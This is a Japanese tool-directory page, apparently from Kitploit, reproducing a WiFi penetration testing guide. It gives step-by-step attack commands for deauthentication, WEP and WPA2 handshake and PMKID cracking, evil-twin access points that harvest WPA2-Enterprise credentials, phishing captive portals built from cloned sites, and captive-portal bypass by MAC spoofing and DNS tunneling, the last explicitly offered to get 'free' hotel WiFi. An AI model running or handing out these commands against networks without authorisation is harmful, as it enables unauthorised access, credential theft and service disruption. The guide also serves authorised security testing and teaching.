Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
wifi-pentesting-guide — WiFiペネトレーションテストガイド | Kitploit
ツール/GitHubGitHub/ricardojoserf/wifi-pentesting-guide
パスワードクラッキングWi-Fi監査情報収集ポストエクスプロイトワイヤレスセキュリティペネトレーションテストソーシャルエンジニアリング学習と教育
GitHubricardojoserf/wifi-pentesting-guide

wifi-pentesting-guide

WiFiペネトレーションテストガイド

リポジトリを見る
7341132年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

WiFi ペネトレーションテストガイド

目次

  1. 基本コマンド

  2. オープンネットワーク

    2.1. キャプティブポータル

    2.2. 中間者攻撃

  3. WEPクラッキング

    3.1. クライアントなし

  4. WPA2-PSKクラッキング

    4.1. 4ウェイハンドシェイクのクラッキング

    4.2. PMKID攻撃

    4.3. APなし攻撃

  5. WPA2-Enterprise

    5.1. 偽のアクセスポイント

    5.2. ブルートフォース

    5.3. サポートされているEAP方式

  6. その他の攻撃

    6.1. Krack攻撃とFrag攻撃

    6.2. OSINT

    6.3. WiFiジャミング

    6.4. その他のフレームワーク

  7. ポストエクスプロイテーション

    7.1. ルーターへの攻撃

    7.2. スキャナーの種類

    7.3. スプーフィング



1. 基本コマンド

環境変数の設定

root@kitploit:~
VARIABLE=value

インターフェースモードの確認

root@kitploit:~
iwconfig $IFACE

インターフェースステータスの確認

root@kitploit:~
ifconfig $IFACE

モニターモードの設定

root@kitploit:~
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up

ネットワークの一覧表示

  1. モニターモードを設定する

  2. Airodump-ng-ngを実行する

root@kitploit:~
airodump-ng $IFACE -c $CHANNEL -e $ESSID

認証解除

  1. クライアント1台のみ
root@kitploit:~
 aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
  1. アクセスポイント(AP内の全クライアント)
root@kitploit:~
 aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE

クライアントがいる場合の隠しSSIDの取得

  1. ネットワークを一覧表示する

Airodump-ngを使用してネットワークを一覧表示し、APのMACアドレス($AP_MAC)とクライアントの1つ($CLIENT_MAC)を取得します。キャプチャを停止しないでください。

  1. 認証解除

別の端末で、クライアントまたはすべてのクライアントを認証解除します。Airodump-ngがこのネットワークからのハンドシェイクをキャプチャすると、最初の端末に名前またはESSIDが表示されます。

root@kitploit:~
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE

クライアントがいない場合の隠しSSIDの取得

  1. ネットワークを一覧表示する

Airodump-ngを使用してネットワークを一覧表示し、APのMACアドレス($AP_MAC)とクライアントの1つ($CLIENT_MAC)を取得します。キャプチャを停止しないでください。

2.a. 辞書攻撃を実行する

root@kitploit:~
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH

2.b. またはブルートフォース攻撃を実行する

root@kitploit:~
mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET

文字セットには、l(小文字)、u(大文字)、n(数字)、c(小文字+大文字)、m(小文字+大文字+数字)、a(すべての印字可能文字)を使用できます。



2. オープンネットワーク

2.1. キャプティブポータル

2.1.1. 偽のキャプティブポータル

  1. HTTrack を使用してWebサイトをクローンする

  2. Wifiphiser をインストールします。wifiphisher/data/phishing-pages/new_page/html に新しいフォルダを作成し、HTTrackの結果を追加します。また、wifiphisher/data/phishing-pages/new_page/config.ini に設定ファイルを追加します。

  3. python setup.py install または bin 内のバイナリを使用してプロジェクトを再コンパイルします。

  4. 以下のコマンドは、hostapdをインストールした最新のKaliリリースで正しく動作します。

root@kitploit:~
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE

2.1.2. バイパス1: MACスプーフィング

キャプティブポータルをバイパスする最初の方法は、MACアドレスを既に認証済みのユーザーのものに変更することです。

  1. ネットワークをスキャンし、IPアドレスとMACアドレスのリストを取得します。以下を使用できます。
  • nmap

  • これ(Bash)やこれ(Python)のようなカスタムスクリプト

  1. IPアドレスとMACアドレスを変更します。以下を使用できます。
  • macchanger

  • これ(Bash)のようなカスタムスクリプト

また、以下のような自動化スクリプトを使用することもできます。

  • Poliva script

  • Hackcaptiveportals


2.1.3. バイパス2: DNSトンネリング

2つ目の方法は、DNSトンネルを作成することです。このためには、自分自身でアクセス可能なDNSサーバーが必要です。この方法を使用して、ホテルや空港などでキャプティブポータルをバイパスし、「無料」のWiFiを利用できます。

  1. ドメイン名が解決されることを確認します。
root@kitploit:~
nslookup example.com
  1. 2つのDNSレコードを作成します(DigitalOcean、Afraid.orgなど)。
  • 「Aレコード」: dns.$DOMAIN を $SERVER_IP に向ける(例: dns.domain.com 139.59.172.117)

  • 「NSレコード」: hack.$DOMAIN を dns.$DOMAIN に向ける(例: hack.domain.com dns.domain.com)

  1. サーバー側の実行
root@kitploit:~
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
  1. こちら で正しく動作するか確認します

  2. クライアント側の実行

root@kitploit:~
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
  1. トンネルを作成する
root@kitploit:~
ssh -D 8080 [email protected]

2.2. 中間者攻撃

ネットワークに接続したら、中間者攻撃に対して脆弱かどうかをテストできます。

  1. Ettercap を使用したARPスプーフィング攻撃

  2. WiresharkまたはTCPdumpを使用してトラフィックをスニッフィングする

  3. PCredz(Linux)または Network Miner(Windows)を使用してトラフィックを分析する



3. WEPクラッキング

  1. キャプチャを開始する
root@kitploit:~
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. 偽の認証 + ARPリクエストリプレイ攻撃 + ユーザーの認証解除 を使用してIVキャプチャを加速します。Airodumpを約100,000の異なるIVで停止します。
root@kitploit:~
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. Aircrack-ngを使用してパスワードをクラックする
root@kitploit:~
aircrack-ng $PCAP_FILE


4. WPA2-PSKクラッキング

4.1. 4ウェイハンドシェイクのクラッキング

  1. キャプチャを開始する
root@kitploit:~
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. ユーザーを認証解除します。'WPA handshake: $MAC' というメッセージが表示されたら、airodumpのキャプチャを停止します。
root@kitploit:~
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. オプション1: Aircrack-ngを使用してハンドシェイクをクラックする
root@kitploit:~
aircrack-ng -w $WORDLIST capture.cap

ワードリストはこちらから入手できます。

  1. オプション2: Pyritを使用してハンドシェイクをクラックする
root@kitploit:~
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db

4.2. PMKID攻撃

このスクリプトを使用するか、以下の手順に従ってください。

  1. HcxdumptoolとHcxtoolをインストールします(このスクリプトを使用できます)。

  2. Network Managerを停止する

root@kitploit:~
airmon-ng check kill

3a. 特定のMACアドレスを攻撃する場合

  • テキストファイル($FILTER_FILE)を作成し、":"を含まないMACアドレスを追加します。sedを使用して出力をファイルにリダイレクトできます。
root@kitploit:~
echo $MAC | sed 's/://g' > $FILTER_FILE
  • PMKIDをキャプチャする
root@kitploit:~
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
  1. $HASH_FILEを作成する
root@kitploit:~
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE

各行の構造は: PMKID * ルーターMAC * ステーション * ESSID(確認: https://www.rapidtables.com/convert/number/hex-to-ascii.html)

  1. Hashcat(オプション16800)を使用してクラックする
root@kitploit:~
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force

4.3. APなし攻撃

WiFi接続がオンになっているクライアントデバイスにアクセスできるが、周囲にネットワークがない場合でも、そのクライアントデバイスが以前に接続したことがあるネットワークを攻撃できます。

そのためには、この設定ファイルのようなものを使ってhostapdで偽のアクセスポイントを作成し、任意のパスワードで同じネットワーク名を使用します。偽のネットワークを作成すると、クライアントデバイスがそれに接続しようとし、このガイドの4.1節と同じように4ウェイハンドシェイクを取得できます。



5. WPA2-Enterprise

5.1 偽のアクセスポイント

仮想マシンのダウンロード

ローカルインストール

仮想マシンを使用したくない場合は、以下を使用してすべてをインストールできます。

root@kitploit:~
git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack

cd WPA_Enterprise_Attack && sudo sh install.sh

Hostapd と Freeradius-wpe

アクセスポイントを起動します。

root@kitploit:~
sh freeradius_wpe_init.sh $AP_NAME $INTERFACE

クライアントが接続したら、ログを読み取ります。

root@kitploit:~
sh freeradius_wpe_read.sh

Hostapd-wpe

root@kitploit:~
sh hostapd_wpe_init.sh $AP_NAME $INTERFACE

5.2 ブルートフォース

  • Airhammer

5.3 サポートされているEAP方式

サポートされているEAP方式を調べる

  • EAP_buster


6. その他の攻撃

6.1. Krack攻撃とFrag攻撃

これらは、偉大な Mathy Vanhoef によって発見された2つの高度な攻撃です。

  • Krack Attack Scripts - このWebサイトで説明されています

  • Frag Attack Scripts - このWebサイトで説明されています

6.2. OSINT

  • Wigle

6.3. WiFiジャミング

  • Wifijammer - このプログラムは、APとクライアントの両方に認証解除パケットを送信できます。

偽のアクセスポイントを除くすべてのデバイスを認証解除する例:

root@kitploit:~
sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC

6.4. その他のフレームワーク

Linux:

  • Sniffair
  • Wifi Pumpkin - 不正なWiFiアクセスポイント攻撃のためのフレームワーク
  • Eaphammer - 偽のアクセスポイントのためのフレームワーク
  • WEF - WPA/WPA2およびWEP向けのさまざまな攻撃のためのフレームワーク、自動ハッシュクラッキングなど

Windows:

  • Acrylic - 偵察フェーズに便利
  • Ekahau - Wi-Fi計画に便利
  • Vistumbler - ウォードライビングに便利


7. ポストエクスプロイテーション

ネットワークに接続したら

7.1. ルーターへの攻撃

  • Routersploit - 組み込みデバイス向けエクスプロイトフレームワーク - "use scanners/autopwn" をテストしてください

7.2. スキャナーの種類

  • Nmap/Zenmap - セキュリティスキャナー、ポートスキャナー、ネットワーク探索ツール

  • Masscan - nmapの高速版(設定を壊す可能性があるため注意してください)

  • Netdiscover - ARPスニッフィング。ネットワークが細かくセグメント化されている場合に非常に便利です

7.3. スプーフィング

  • Ettercap - MitM攻撃が可能かどうか、およびネットワーク内のすべてのトラフィックをスニッフィングできるかどうかを確認します
ツールをダウンロード
オペレーティングシステムプラットフォーム認証情報サイズリンク
Ubuntu 16.04.5VMwarericardojoserf:wifi3.25 GBMEGA
Kali 2019.1VMwareroot:wifi4.99 GBMEGA
Ubuntu 16.04.5VirtualBox (OVA)ricardojoserf:wifi3.18 GBMEGA
Kali 2019.1VirtualBox (OVA)root:wifi5.56 GBMEGA